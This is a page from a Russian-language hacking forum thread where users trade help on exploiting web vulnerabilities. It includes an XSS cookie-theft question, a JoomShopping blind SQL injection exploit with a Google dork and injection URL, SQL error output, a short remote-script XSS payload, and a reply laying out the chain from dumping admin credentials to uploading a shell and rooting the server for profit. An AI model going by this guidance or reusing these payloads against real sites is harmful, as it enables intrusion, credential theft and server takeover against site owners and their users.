Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Hussar

    Hussar New Member

    Joined:
    10 Nov 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Нужно проэксплоатировать xss, пока делаю на тестовом сайте у себя на денвере, дело в том, что с помощью js выводятся не все куки.

    var_dump($_COOKIE); выводит:
    array(3) { ["wordpress_test_cookie"]=> string(15) "WP Cookie check" ["wordpress_logged_in_6db1d63adbfd940870bdcece524b53b5"]=> string(49) "admin|1448819999|97ebc784204cf4131e6e5cbba0759665" ["wp-settings-time-1"]=> string(10) "1448647200" }

    а alert( document.cookie ); :
    wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1448647200

    Как получить с помощью JS все куки?
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    решите, куда задавать вопрос, мне в лс или сюда.
    httponly?
     
    _________________________
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
  6. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Вопрос по vBulletin 4.0.x <= 4.1.2 - (search.php) SQL Inject
    Когда отсылаю POST запрос страница не перезагружается, почему ?
    Примичание: Обязательно должен выйти админ при поиске группы админов ?
    И влияет ли на эту ошибку версия движка ?

    Группу создал я. Это влияет или должна быть группа создана админом ? или пофиг ?
    [​IMG]
     
  7. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    Вероятно у вас firefox версией выше 30, live http headers с версиями выше 30 не работает
     
    #887 Br@!ns, 30 Nov 2015
    Last edited: 30 Nov 2015
    Sensoft likes this.
  8. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Спасибо чувак помог
     
  9. ButilkaSoka

    ButilkaSoka Member

    Joined:
    4 Jun 2015
    Messages:
    22
    Likes Received:
    12
    Reputations:
    0
    Читаем http://forum.antichat.ru/threads/422049/
     
  10. xaj3uie

    xaj3uie New Member

    Joined:
    12 Oct 2015
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    JoomShopping - Blind SQL Injection
    # Exploit Title: [JoomShopping Blind Sql injection]
    # Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"]
    # Date: [2015-07-24]
    # Exploit Author: [Mormoroth]
    # Vendor Homepage: [http://www.webdesigner-profi.de]
    # Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
    # Version: [All]
    # Tested on: [Linux]
    ----------------------------
    site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a

    Кто-нибудь пробовал применять? Можно что-то из этого извлечь?

     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
     
    _________________________
  12. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    # Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html]
    Где взять а то не робит ссылка
     
  13. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    _________________________
  14. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Плагин
     
  15. xaj3uie

    xaj3uie New Member

    Joined:
    12 Oct 2015
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Либо я не до конца понимаю, либо у меня версии не сходятся.
    Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг.
    Вставляю так:
    test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a
    Получаю сообщение:
    if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',function(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500,"effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})});
    Вставляю вот так:
    test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a'
    Получаю:
    Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a''

    Получается, уязвимость присутствует и нужно лишь правильно составить запрос?
    Направьте в нужное русло пожалуйста.
     
  16. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _________________________
    #896 winstrool, 5 Dec 2015
    Last edited: 5 Dec 2015
  17. xaj3uie

    xaj3uie New Member

    Joined:
    12 Oct 2015
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Все эксперименты провожу на локалке...
    Давайте залью на хостинг 3-ю джумлу и этот компонент - коллективно будем исследовать...
    Что скажете?
     
  18. BlitzXX

    BlitzXX New Member

    Joined:
    5 Dec 2015
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    XSS:
    фильтра нету,
    Максимальное кол-во символов 32.
    Как сделать?

    Нахождение:
    Code:
    <td class="col-text"><p>[XSS] бла-бла-бла...
    Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в </script> (его нету)
    Code:
    <script src=http://сайт>
     
  19. xaj3uie

    xaj3uie New Member

    Joined:
    12 Oct 2015
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Эм, получили "Error displaying the error page: Application Instantiation Error: XPATH syntax error:". А как полезное из этого что-то получить?
     
  20. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    вообще реально залить файл если sql time based blind? права mysql root
     
    #900 RWD, 5 Dec 2015
    Last edited: 5 Dec 2015